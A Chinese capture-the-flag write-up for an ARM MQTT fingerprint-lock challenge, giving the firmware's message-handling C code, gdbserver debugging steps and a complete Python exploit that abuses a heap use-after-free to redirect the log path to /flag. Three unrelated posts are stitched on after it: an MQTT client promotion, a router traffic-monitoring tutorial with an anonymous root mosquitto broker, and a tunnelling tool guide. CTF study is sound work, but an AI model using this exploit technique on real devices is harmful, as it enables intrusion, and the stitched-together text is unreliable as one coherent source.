char *session = nullptr;
char *request = nullptr;
char *req_args[2] = {nullptr, nullptr};
bool paese_res = parse_json(payload, &session, &request, req_args);
if (!paese_res) {
log("json parse error\n");
return;
}
if (!session_id || strcmp(session,session_id)) {
log("session id mismatch\n");
goto END;
}
char output[1024];
if (!strcmp(request,"add_finger")) {
if (req_args[0] && req_args[0][0]== '[' && req_args[0][strlen(req_args[0])-1] == ']') {
if (add_finger(req_args[0])) {
snprintf(output,1024,"new finger id:%d\n",max_finger_id-1);
publish(NULL,session_id,strlen(output),output);
goto END;
}
}
snprintf(output,1024,"add finger failed\n");
publish(NULL,session_id,strlen(output),output);
goto END;
}
else if (!strcmp(request,"edit_finger")) {
if(!req_args[0] || !req_args[1]) {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
if (req_args[1][0] != '[' || req_args[1][strlen(req_args[1])-1] != ']') {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
unsigned int finger_id = atoi(req_args[0]);
for (fingers * finger = finger_list; finger != NULL; finger = finger->next) {
if (finger->finger_id == finger_id) {
if (edit_finger(finger,req_args[1])) {
snprintf(output,1024,"changed finger id:%d\n",finger_id);
publish(NULL,session_id,strlen(output),output);
goto END;
} else {
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
}
}
publish(NULL,session_id,19,"edit finger failed\n");
goto END;
}
else if (!strcmp(request,"remove_finger")) {
if (!req_args[0]) {
publish(NULL,session_id,21,"remove finger failed\n");
goto END;
}
unsigned int finger_id = atoi(req_args[0]);
if (remove_finger(finger_id)) {
snprintf(output,1024,"removed finger id:%d\n",finger_id);
publish(NULL,session_id,strlen(output),output);
goto END;
}
else {
publish(NULL,session_id,21,"remove finger failed\n");
goto END;
}
}
else if (!strcmp(request,"lock_door")) {
if (lock_door()) {
publish(NULL,session_id,18,"lock door success\n");
goto END;
} else {
publish(NULL,session_id,17,"lock door failed\n");
goto END;
}
}
else if (!strcmp(request,"unlock_door")) {
if (unlock_door()) {
publish(NULL,session_id,20,"unlock door success\n");
goto END;
} else {
publish(NULL,session_id,19,"unlock door failed\n");
goto END;
}
}
END:
if(session) free(session);
if(request) free(request);
if(req_args[0]) free(req_args[0]);
if(req_args[1]) free(req_args[1]);
return;
}
else if(!strcmp(message->topic, "logger")) {
char * payload = (char*)message->payload;
if (!auth_token){
publish(NULL, "logfile", 15, "not authorized\n");
return;
}
if (!strcmp(payload,"download")) {
download_log();
}
else if (!strcmp(payload,"clear")) {
clear_log();
}
}
else if(auth_token && !strcmp(message->topic, auth_token)) {
char * payload = (char*)message->payload;
char re_auth_token[20];
snprintf(re_auth_token, 20, "re_%s", auth_token);
fingers* cur_finger = finger_list;
while (cur_finger != NULL) {
if (check_finger(cur_finger,payload)) {
if (session_id) {
free(session_id);
unsubscribe(NULL, session_id);
}
session_id = (char*)malloc(0x11);
for (int i = 0; i<0x10;i++) {
session_id[i] = session_nums[(rand()%62)];
}
session_id[0x10] = 0;
char output_session[0x30];
snprintf(output_session, 0x30, "login successed. session_id: %s\n", session_id);
publish(NULL, re_auth_token, strlen(output_session), output_session);
return;
}
cur_finger = cur_finger->next;
}
publish(NULL, re_auth_token, 13, "login failed\n");
}
}

本题中最重要的函数,也就是mqtt客户端接收到信息的回调函数——on_message

image.png

首先是登录处理逻辑

这里需要用户在auth_token话题自定义一个token,然后系统会订阅token这个话题,此时auth_token不再为空,如果有新的token,会将原先的覆盖掉

image.png

如果话题是logger,那么就可以查看日志文件,泄露指纹信息,这里只要求auth_token有值,所以我们只需要一开始随意登录一下就可以了

image.png

这里对应的是身份认证处理逻辑,在登录(auth_token不为空)之后,就要发送指纹信息,随后check_finger函数就会检测是否是有效指纹,如果是,则会返回一个session_id

image.png

最后是manager话题,首先这个话题会利用parse_json函数解析出session,request,req_args这三个参数,随后会比较用户发送的session_id是否和成功认证返回的session_id相一致,如果一致,则会根据request对应的请求执行增删改操作

image.png

添加指纹操作

image.png

修改指纹操作

image.png

删除指纹操作

image.png

开关门操作

image.png

其他回调函数不重要

如何调试

准备gdbserver

由于本题是arm架构,所以首先你要准备一个arm架构的gdbserver,我是直接从FirmAE里面找gdbserver了

image.png

这里我选择用python起一个http服务,通过网络进行传输

修改启动脚本

这里我们要把启动脚本修改成如下代码

qemu-system-arm -m 512 -M virt,highmem=off \
-kernel zImage \
-initrd rootfs.cpio \
-net nic \
-net user,hostfwd=tcp::8883-:8883,hostfwd=tcp::1234-:1234 \
-nographic \
-monitor null

增添一个端口映射,这里我选择是1234,用于连接gdbserver,这个端口可以随意选择

传输gdbserver

我们需要将我们wsl里面的gdbserver传到qemu虚拟机里,幸运的是qemu虚拟机里自带了wget命令,因此我们直接通过网络传输即可

wget http://172.26.25.103:8000/gdbserver.armel
mv gdbserver.armel /bin/gdbserver
chmod +x /bin/gdbserver

gdbserver附加到现有进程

ps看一下进程

image.png

gdbserver --attach :1234 63

在本机中启动gdb-multiarch,然后输入

set architecture arm
set endian little
target remote localhost:1234
set glibc 2.38

由于这题是2.38版本的堆,所以需要额外设置一下libc版本

image.png

就可以愉快的开启调试了

EXP讲解

完整EXP如下

import paho.mqtt.client as mqtt
from pwn import *
import time
from time import sleep
import ssl
import re
import json

# MQTT Broker 配置
BROKER = "0.0.0.0"

PORT = 8883
# PORT = 50806
CAFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/ca.crt"
CERTFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.crt"
KEYFILE = "./_rootfs.cpio.extracted/cpio-root/etc/mosquitto/certs/server.key"
AUTH_TOKEN_TOPIC = "auth_token"
VALID_TOKEN_TOPIC = "validtoken123123"
SESSION_ID_TOPIC = "#"  # 一开始订阅所有主题 (#)
mytime = 1
# 用于存储接收到的消息
received_messages = []

def pay(input_str, mylen=80):
# 如果字符串长度小于80,使用复制方式填充至80
while len(input_str) < mylen:
input_str += input_str

# 确保字符串的长度恰好为80
input_str = input_str[:mylen]

# 初始化结果数组
result = []

# 每4个字符一组
for i in range(0, len(input_str), 4):
# 取4个字符
chunk = input_str[i:i + 4]

# 将4个字符转换为对应的十六进制数字
hex_value = 0
for char in chunk:
hex_value = (hex_value << 8) + ord(char)

# 将结果添加到数组中
result.append(hex_value)

return result

def on_connect(client, userdata, flags, rc):
"""连接到 MQTT Broker 时的回调函数"""
print(f"Connected to MQTT Broker with result code {rc}")
client.subscribe(SESSION_ID_TOPIC)  # 订阅所有主题 (#),获取所有消息

def on_message(client, userdata, msg):
"""接收到消息时的回调函数"""
print(f"Received message on topic {msg.topic}: {msg.payload.decode()}")
userdata.append(msg.payload.decode())  # 保存接收到的消息

def publish_message(client, topic, message):
"""发布消息到指定的 MQTT 主题"""
print(f"Publishing message to {topic}: {message}")
client.publish(topic, message, qos=1)

def send_auth_token(client):
"""发送 auth_token 消息"""
message = "validtoken123123"
publish_message(client, AUTH_TOKEN_TOPIC, message)

def send_finger_data(client):
"""发送指纹数据"""
finger_data = "[1373378270,39159,3669886736,2494,2,515555555,2945791524,9283885,155241,259,30956741,169525,4196208728,2948318370,231700,2380113,8528,1416626613,3520135119,42949672977]"
# finger_data = "[1373378309,39159,2147483775,2494,2,515555574,2147483758,9283884,155241,259,30956739,169525,2147483479,2147483548,231699,2380112,8528,1416626458,2147483496,292]"
publish_message(client, VALID_TOKEN_TOPIC, finger_data)

def extract_session_id(messages):
"""从接收到的消息中提取 session_id"""
for message in messages:
match = re.search(r"session_id\s*[:=]\s*([a-zA-Z0-9]+)", message)
if match:
return match.group(1)  # 返回提取到的 session_id
return None

def convert_array_to_string(array):
"""自动将数组转换为字符串,格式为 "[\"element1\",\"element2\",...]",确保没有空格"""
return "[" + ",".join(f"{item}" for item in array) + "]"

def send_edit(client, session_id, index, payload):
"""发送 edit_finger 命令,确保 req_args 符合格式"""
req_args = [
str(index),  # 第一个元素是索引,确保是字符串类型
payload,
]
json_message = {
"session": session_id,
"request": "edit_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化,确保所有字符串都用双引号包裹
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_add_command(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
payload = pay(payload, 88)
req_args = [
convert_array_to_string(payload)  # 指纹数据转为字符串格式
]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_add(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_log(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id,
"request": "add_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "logger", "download")
sleep(mytime)

def send_malloc(client, session_id, payload):
"""发送 add_finger 命令,确保 req_args 符合格式"""
req_args = [payload]
json_message = {
"session": session_id + " aaaabaa////flagaeaaafaaagaaahaaaiaaajaaakaaalaa\x0a\x0aaaanaaaoaaapa" + "/flag" + "\x10\x00\x00\x00\x00\x00\x00",
"request": "kiddingyou",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def send_remove_command(client, session_id, index):
"""发送 remove_finger 命令,确保 req_args 符合格式"""
payload = pay("12345678")
req_args = [
f"{index}", convert_array_to_string(payload)
]
json_message = {
"session": session_id,
"request": "remove_finger",
"req_args": req_args
}
# 使用 json.dumps 进行格式化
publish_message(client, "manager", json.dumps(json_message))
sleep(mytime)

def main():
# 创建 MQTT 客户端实例
client = mqtt.Client(userdata=received_messages)

# 配置 SSL 连接
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)
client.tls_insecure_set(True)

# 设置回调函数
client.on_connect = on_connect
client.on_message = on_message

# 连接到 MQTT Broker
print(f"Connecting to MQTT Broker at {BROKER}:{PORT}...")
client.connect(BROKER, PORT, 60)

# 启动接收消息的循环
client.loop_start()

# 发送认证 token
send_auth_token(client)
print("\033[33mSent auth token and finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 发送有效的指纹数据
send_finger_data(client)
print("\033[33mSent finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 获取 session_id,监听接收到的消息
print("Waiting for session_id...")
time.sleep(mytime)  # 等待一段时间来接收消息

# 提取 session_id 并根据 session_id 去订阅该 session 的主题
session_id = extract_session_id(received_messages)

# session_id="02wakqZtjQ5rDm9G"

if session_id:
print(f"Session ID received: {session_id}")
# 这里用第一个命令行参数
offset = 0

# 订阅该 session_id 主题并等待接收指纹管理相关的消息
client.subscribe(f"{session_id}")
# 取消订阅全部
client.unsubscribe(SESSION_ID_TOPIC)
time.sleep(mytime)  # 等待消息
# 2 add free
send_add(client, session_id,
"[1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
pause()
# uaf 修改fd为自己-8
heap = 0x387898 + offset
xor = (heap - 8) ^ (heap >> 12)
send_edit(client, session_id, 2,
f"[{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]")
pause()
# 申请到自己3
send_add(client, session_id,
"[1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 申请到自己-8,为4
pause()
send_add(client, session_id,
"[0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 此处修改next,为日志路径
log_path = 0x35b1f0 + offset
send_edit(client, session_id, 3, f"[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]")
send_remove_command(client, session_id, 3)
send_remove_command(client, session_id, 1)
tmp1 = 0x39d8e0 + offset
tmp2 = 0x389108 + offset
tmp3 = 0x35b4d8 + offset
tmp4 = 0x399c20 + offset
tmp5 = 0x39a240 + offset
send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]")
pause()
client.subscribe("#")
send_log(client, session_id, "/flag")
if "flag{" in received_messages or "TPCTF{" in received_messages or "tpctf{" in received_messages:
flag = (received_messages)
return flag
return 0
else:
print("No session ID found in received messages.")

# 停止 MQTT 客户端的循环并断开连接
client.loop_stop()
client.disconnect()

if __name__ == "__main__":
main()

接下来我们详细讲一下exp的原理

# 创建 MQTT 客户端实例
client = mqtt.Client(userdata=received_messages)

# 配置 SSL 连接
client.tls_set(ca_certs=CAFILE, certfile=CERTFILE, keyfile=KEYFILE)
client.tls_insecure_set(True)

# 设置回调函数
client.on_connect = on_connect
client.on_message = on_message

# 连接到 MQTT Broker
print(f"Connecting to MQTT Broker at {BROKER}:{PORT}...")
client.connect(BROKER, PORT, 60)

# 启动接收消息的循环
client.loop_start()

首先是mqtt服务器的初始化操作,后面都可以直接拿来复用,目的是链接mqtt的broker,初始化接收消息,完成连接等操作的回调函数

# 发送认证 token
send_auth_token(client)
print("\033[33mSent auth token and finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 发送有效的指纹数据
send_finger_data(client)
print("\033[33mSent finger data.\033[0m")
time.sleep(mytime)  # 等待消息发送

# 获取 session_id,监听接收到的消息
print("Waiting for session_id...")
time.sleep(mytime)  # 等待一段时间来接收消息

# 提取 session_id 并根据 session_id 去订阅该 session 的主题
session_id = extract_session_id(received_messages)

然后就是要发送认证token,发送成功之后,获得一个会话,然后如果指纹验证成功,就可以获得该会话的session_id,而正确的指纹数据就是通过前面的爆破exp获得

# 2 add free
send_add(client, session_id,
"[1633771874,a,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
pause()
# uaf 修改fd为自己-8
heap = 0x387898 + offset
xor = (heap - 8) ^ (heap >> 12)
send_edit(client, session_id, 2,
f"[{xor},0,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,14593470,97,0,0,0,0,0,0]")
pause()
# 申请到自己3
send_add(client, session_id,
"[1,2,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 申请到自己-8,为4
pause()
send_add(client, session_id,
"[0,97,0,97,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,1633771873,9]")
# 此处修改next,为日志路径
log_path = 0x35b1f0 + offset
send_edit(client, session_id, 3, f"[1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,703710,703710,{log_path},9]")
send_remove_command(client, session_id, 3)
send_remove_command(client, session_id, 1)
tmp1 = 0x39d8e0 + offset
tmp2 = 0x389108 + offset
tmp3 = 0x35b4d8 + offset
tmp4 = 0x399c20 + offset
tmp5 = 0x39a240 + offset
send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]")

这一段就是攻击的核心代码,接下来结合调试进行讲解,建议读者在阅读时逐行下断点调试查看

image.png

第一次目的是制造uaf

刚刚malloc完:

image.png

被free掉之后:

image.png

然后利用edit修改:

image.png

由于log字符串对应的伪造堆块,在finger_id偏移处值为0x271,所以下一次edit要设置finger_id为0x271=625,其余值保持不变即可

send_edit(client, session_id, 625,
f"[{tmp1},1,{tmp2},19,30,0,0,0,{tmp3},5,1634493999,103,0,0,0,0,0,0,{tmp4},{tmp5},,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,]"

这也就是为什么最后一次edit要有一个莫名其妙的625出现的原因

image.png

可以看到此时log字符串已经修改成了/flag

image.png

复现成功!

image.png

佬们好,最近在工作的时候需要使用 mqtt,然后调试的时候来回复制粘贴有点麻了,于是 vibe 了一个 mqtt 客户端,可以发送快捷指令,导入导出配置,方便多设备调试,这是我的第一个开源项目,大佬们多多包涵。

GitHub 项目地址:GitHub - HaxIOX/northrealm-mqtt: Northrealm (NR) — MQTT debugger / MQTT client (Web + Windows Desktop).
web 端:Northrealm MQTT

目前支持 Web 端Windows 桌面端(Electron) ,后续计划扩展 移动端


亮点功能

  • 配置导出 / 导入 :快速备份与迁移多套 Broker / 连接参数
  • 快捷指令 :一键发送常用消息 / 主题组合,减少反复复制粘贴
  • 排障友好日志与诊断提示 :连接过程更直观,便于定位认证 / ClientID / 协议等问题


演示图


📌 转载信息
原作者:
HaxIOX
转载时间:
2025/12/26 18:44:07

小米 AX6000 路由器虽然身形巨大无比,但自带的网速查看功能却十分简陋,约等于没有。幸好系统是基于 OpenWrt 的,可以自己动手实现一个。

Step 1: 寻找数据

命令:

ubus call trafficd hw '{"debug": true}'

使用 MQTT / Python / Grafana 实现小米路由器网速查看与统计
简单的命令却寻觅最久,机缘巧合之下才发现... 使用时加入 debug 参数以获得更多信息。

Step 2:加工处理

有了数据源就好做了,定时采样加工处理再展示即可。小米路由器自带了一部分 MQTT 工具,因此使用 MQTT 将数据源转发给电脑处理并入库,再使用 Grafana 做展示。即使电脑不一直开机也没关系,通过配置,MQTT broker 可持久化暂存未处理消息。

2.1 安装 Mosquitto broker 2.0

小强系统自带了 MQTT client ,只需安装支持 MQTT v5 的 broker 即可。手动下载 ipk 文件,解压后获得可执行文件(.\data.tar.gz.\usr\sbin\mosquitto),将其上传到路由器中并注册为服务。如果 opkg 可用更佳。

Cortex-A53: mosquitto-nossl_2.0.15-1_aarch64_cortex-a53.ipk

更多: https://mirrors.aliyun.com/openwrt/releases/22.03-SNAPSHOT/packages/

创建配置文件:

/etc/mosquitto.conf:

# log_dest file /tmp/log/mosquitto.log
user root
bind_address 0.0.0.0
allow_anonymous true

/etc/init.d/mosquitto-2

#!/bin/sh /etc/rc.common

START=50

start() {
    /data/cz/bin/mosquitto-2 -c /etc/mosquitto.conf -d
    return 0
}

2.2 定时采样

创建 cron job 实现定时采样,可结合 sleep 实现分钟内采样。

* * * * * ubus -S call trafficd hw '{"debug": true}' | mosquitto_pub -t 'home/router-stat' -q 2 -i client_pub -l -D publish user-property timestamp $(date +%s) >/dev/null 2>&1

2.3 编写程序解析数据并入库

使用 Python 编写 MQTT 消费者程序,解析数据并写入数据库。如果是 Windows 可以使用 nssm 将其注册为服务。
配置在 config.py 中。
创建所需表:

CREATE TABLE router_stat (
    id INTEGER NOT NULL AUTO_INCREMENT,
    ip VARCHAR(15),
    mac CHAR(17),
    network ENUM('2.4G','5G','Ethernet','Unknown'),
    device VARCHAR(255),
    rx_rate INTEGER,
    tx_rate INTEGER,
    timestamp DATETIME,
    PRIMARY KEY (id)
);

2.4 安装 Grafana 并创建监控面板

有了数据就可以用 Grafana 自由的创建监控面板了~

比如创建一个 Time series 面板来查看上传下载总速度:

select sum(rx_rate) as rx_rate, sum(tx_rate) as tx_rate, unix_timestamp(timestamp) as time from home.router_stat where $__timeFilter(timestamp) group by timestamp

Screenshot:
使用 MQTT / Python / Grafana 实现小米路由器网速查看与统计1

介绍

Anynat 是一款通用性极强的内网穿透工具,能够适应复杂的内网环境,在较差的网络条件下,仍然能够提供稳定可靠的数据传输.

安装方式

  1. docker 容器化部署 Anynat(推荐)
  2. npm 安装方式(不推荐)

*阅读本文档之前,会默认您有一定的网络知识,例如如何输入命令,怎样配置和解析域名等,文档不再赘述,自行搜索相关答案

本文档仅提供 docker 部署方法,如果采用 npm 安装方式,则默认您具有一定的编程知识,需要自行摸索和解决 npm 相关问题*

docker 容器化部署 Anynat

  1. Anynat 需要同时部署服务端和客户端

    • 服务端是指具有公网 IP 的服务器.例如阿里云,腾讯云的服务器,当然也有一些第三方免费的服务器,需要自行准备
    • 客户端是指你的内网服务器.例如你的 nas,台式电脑,笔记本或者其他系统平台,需要暴露自己本地的服务给外面的人访问就是客户,需要自行准备
  2. 部署服务端 /客户端之前,建议准备一个干净的系统,只安装 docker 相关的软件依赖

    部署 docker 的教程文档( 服务端和客户端都需要安装好 docker ):

  3. ubuntu/linux/macos 教程:https://docs.docker.com/engine/install/ubuntu/
  4. windows 教程:https://docs.docker.com/desktop/install/windows-install/
  5. 中文安装教程:https://zhuanlan.zhihu.com/p/441965046
  6. 其他语言的 docker 安装方法自行搜索
  7. 建议提前准备好一个域名,没有域名也没问题,有公网 IP 即可.需要提前将域名开启 HTTPS 并解析到您的服务器公网 IP,推荐使用 cloudflare 作为域名解析平台
  8. 服务端和客户端共用同一份配置文件,如果配置对不上,则无法使用内网穿透服务,每次修改好配置需要重启 Anynat 容器 /重启系统
  9. 点击阅读服务端安装方法
  10. 点击阅读客户端安装方法

你的下一个内网穿透工具何必是 ngrok,frp,Natapp 呢~~ 感谢支持???